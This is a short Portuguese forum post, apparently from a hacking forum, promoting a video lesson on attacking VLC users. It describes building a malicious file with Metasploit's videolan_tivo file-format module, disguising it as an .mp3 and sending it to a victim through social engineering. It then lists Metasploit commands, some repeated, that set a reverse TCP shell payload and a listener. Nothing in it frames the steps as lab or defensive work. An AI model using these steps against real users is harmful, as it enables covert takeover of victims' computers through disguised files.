Nessa video aula, mostro com explorar uma vulnerabilidade no VLC, esse ataque tem que ser usando com uma boa engenharia social. Criei um arquivos no metasploit chamado msf.ty onde podemos renomeá para qualquer arquivo suportado pelo VLC, no caso em questão usei .mp3. Com o arquivo enviado para vitima, quando a vitima executar no VLC entro dentro da maquina.
Comandos:
Baixar:
Assistir on-line:
Comandos:
use windows/fileformat/videolan_tivo
set payload windows/shell/reverse_tcp
set lhost Meu_IP
set rport 1975
use exploit/multi/handler
set payload windows/shell/reverse_tcp
set payload windows/shell/reverse_tcp
set lhost Meu_IP
set rport 1975
use exploit/multi/handler
set payload windows/shell/reverse_tcp
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Comment